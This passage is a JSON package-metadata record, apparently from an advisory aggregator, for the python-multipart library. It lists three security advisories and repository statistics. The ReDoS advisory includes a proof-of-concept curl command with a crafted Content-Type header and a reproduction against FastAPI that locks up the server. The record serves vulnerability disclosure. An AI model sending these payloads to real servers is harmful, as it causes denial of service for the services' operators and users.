configurations.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-01-26T23:28:05.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.6,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L","references":["https://github.com/Kludex/python-multipart/security/advisories/GHSA-wp53-j4wj-2cfg","https://github.com/Kludex/python-multipart/commit/9433f4bbc9652bdde82bbe380984e32f8cfc89c4","https://github.com/Kludex/python-multipart/releases/tag/0.0.22","https://nvd.nist.gov/vuln/detail/CVE-2026-24486","https://github.com/advisories/GHSA-wp53-j4wj-2cfg"],"source_kind":"github","identifiers":["GHSA-wp53-j4wj-2cfg","CVE-2026-24486"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-01-27T00:00:08.310Z","updated_at":"2026-06-14T01:02:16.156Z","epss_percentage":0.01021,"epss_percentile":0.77525,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13cDUzLWo0d2otMmNmZ84ABRlg","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS13cDUzLWo0d2otMmNmZ84ABRlg","packages":[{"ecosystem":"pypi","package_name":"python-multipart","versions":[{"first_patched_version":"0.0.22","vulnerable_version_range":"\u003c 0.0.22"}],"purl":"pkg:pypi/python-multipart"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13cDUzLWo0d2otMmNmZ84ABRlg/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01OWc1LXhnY3EtNHF3M84ABB_q","url":"https://github.com/advisories/GHSA-59g5-xgcq-4qw3","title":"Denial of service (DoS) via deformation `multipart/form-data` boundary","description":"### Summary\n\nWhen parsing form data, `python-multipart` skips line breaks (CR `\\r` or LF `\\n`) in front of the first boundary and any tailing bytes after the last boundary. 
This happens one byte at a time and emits a log event each time, which may cause excessive logging for certain inputs.\n\nAn attacker could abuse this by sending a malicious request with lots of data before the first or after the last boundary, causing high CPU load and stalling the processing thread for a significant amount of time. In case of ASGI application, this could stall the event loop and prevent other requests from being processed, resulting in a denial of service (DoS).\n\n### Impact\n\nApplications that use `python-multipart` to parse form data (or use frameworks that do so) are affected. \n\n### Original Report\n\nThis security issue was reported by:\n- GitHub security advisory in Starlette on October 30 by @Startr4ck\n- Email to `python-multipart` maintainer on October 3 by @mnqazi","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-12-02T21:37:04.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/Kludex/python-multipart/security/advisories/GHSA-59g5-xgcq-4qw3","https://nvd.nist.gov/vuln/detail/CVE-2024-53981","https://github.com/Kludex/python-multipart/commit/c4fe4d3cebc08c660e57dd709af1ffa7059b3177","https://github.com/advisories/GHSA-59g5-xgcq-4qw3"],"source_kind":"github","identifiers":["GHSA-59g5-xgcq-4qw3","CVE-2024-53981"],"repository_url":"https://github.com/Kludex/python-multipart","blast_radius":35.56369833494301,"created_at":"2024-12-02T22:07:14.232Z","updated_at":"2026-06-14T01:04:09.790Z","epss_percentage":0.00121,"epss_percentile":0.30846,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01OWc1LXhnY3EtNHF3M84ABB_q","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01OWc1LXhnY3EtNHF3M84ABB_q","packages":[{"ecosystem":"pypi","package_name":"python-multipart","versions":[{"first_patched_version":"0.0.18","vulnerable_version_range":"\u003c 
0.0.18"}],"purl":"pkg:pypi/python-multipart"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01OWc1LXhnY3EtNHF3M84ABB_q/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0yanY1LTlyODgtM3czcM4AA5N5","url":"https://github.com/advisories/GHSA-2jv5-9r88-3w3p","title":"python-multipart vulnerable to Content-Type Header ReDoS","description":"### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.\n\nThis can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\n### PoC\n\nCreate a simple WSGI 
application, that just parses the `Content-Type`, and run it with `python main.py`:\n\n```Python\n# main.py\nfrom wsgiref.simple_server import make_server\nfrom wsgiref.validate import validator\n\nfrom multipart.multipart import parse_options_header\n\n\ndef simple_app(environ, start_response):\n    _, _ = parse_options_header(environ[\"CONTENT_TYPE\"])\n\n    start_response(\"200 OK\", [(\"Content-type\", \"text/plain\")])\n    return [b\"Ok\"]\n\n\nhttpd = make_server(\"\", 8123, validator(simple_app))\nprint(\"Serving on port 8123...\")\nhttpd.serve_forever()\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8123/'\n```\n\n### Impact\n\nThis is a ReDoS, (Regular expression Denial of Service), so it only applies to those using python-multipart to read form data, such as Starlette and FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal report to FastAPI\u003c/summary\u003e\n\nHey Tiangolo!\n\nMy name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. 
After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n    username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n    return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n    return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n    return {\"username\": item.username}\n```\n\nI'm running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\nYou'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. 
So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n\u003c/details\u003e","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-02-12T17:28:12.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p","https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4","https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74","https://nvd.nist.gov/vuln/detail/CVE-2024-24762","https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5","https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc","https://github.com/pypa/advisory-database/tree/main/vulns/fastapi/PYSEC-2024-38.yaml","https://github.com/tiangolo/fastapi/releases/tag/0.109.1","https://github.com/github/advisory-database/pull/4829","https://github.com/advisories/GHSA-2jv5-9r88-3w3p"],"source_kind":"github","identifiers":["GHSA-2jv5-9r88-3w3p","CVE-2024-24762"],"repository_url":"https://github.com/Kludex/python-multipart","blast_radius":0.0,"created_at":"2024-02-12T20:25:25.665Z","updated_at":"2026-06-14T01:06:05.542Z","epss_percentage":0.03333,"epss_percentile":0.87501,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yanY1LTlyODgtM3czcM4AA5N5","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0yanY1LTlyODgtM3czcM4AA5N5","packages":[{"ecosystem":"pypi","package_name":"python-multipart","versions":[{"first_patched_version":"0.0.7","vulnerable_version_range":"\u
003c= 0.0.6"}],"purl":"pkg:pypi/python-multipart"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yanY1LTlyODgtM3czcM4AA5N5/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/pypi/python-multipart","docker_dependents_count":2067,"docker_downloads_count":57996878,"usage_url":"https://repos.ecosyste.ms/usage/pypi/python-multipart","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pypi/python-multipart/dependencies","status":null,"funding_links":["https://github.com/sponsors/Kludex"],"critical":true,"issue_metadata":{"last_synced_at":"2024-09-30T02:35:49.998Z","issues_count":59,"pull_requests_count":146,"avg_time_to_close_issue":47266892.3877551,"avg_time_to_close_pull_request":3817486.2615384613,"issues_closed_count":49,"pull_requests_closed_count":130,"pull_request_authors_count":15,"issue_authors_count":29,"avg_comments_per_issue":2.6440677966101696,"avg_comments_per_pull_request":1.0547945205479452,"merged_pull_requests_count":113,"bot_issues_count":0,"bot_pull_requests_count":27,"past_year_issues_count":28,"past_year_pull_requests_count":138,"past_year_avg_time_to_close_issue":1882815.68,"past_year_avg_time_to_close_pull_request":1163505.0327868853,"past_year_issues_closed_count":25,"past_year_pull_requests_closed_count":122,"past_year_pull_request_authors_count":12,"past_year_issue_authors_count":13,"past_year_avg_comments_per_issue":1.9642857142857142,"past_year_avg_comments_per_pull_request":1.0869565217391304,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":25,"past_year_merged_pull_requests_count":109,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/issues","maintainers":[{"login":"Kludex","count":59,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Kludex"},{"login":"andrew-d","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andrew-d"},{"login":"tomch
ristie","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tomchristie"}],"active_maintainers":[{"login":"Kludex","count":59,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Kludex"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/python-multipart/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/python-multipart/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/python-multipart/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/python-multipart/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/python-multipart/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/python-multipart/codemeta","maintainers":[{"uuid":"Kludex","login":"Kludex","name":null,"email":null,"url":null,"packages_count":108,"html_url":"https://pypi.org/user/Kludex/","role":null,"created_at":"2023-02-25T06:24:55.666Z","updated_at":"2023-02-25T06:24:55.666Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/Kludex/packages"},{"uuid":"tomchristie","login":"tomchristie","name":null,"email":null,"url":null,"packages_count":53,"html_url":"https://pypi.org/user/tomchristie/","role":null,"created_at":"2023-02-25T06:24:55.689Z","updated_at":"2023-02-25T06:24:55.689Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/tomchristie/packages"},{"uuid":"andrew_d","login":"andrew_d","name":null,"email":null,"url":null,"packages_count":4,"html_url":"https://pypi.org/user/andrew_d/","role":null,"created_at":"2023-02-25T06:24:55.629Z","updated_at":"2023-02-25T06:24:55.629Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/andrew_d/packages"}]}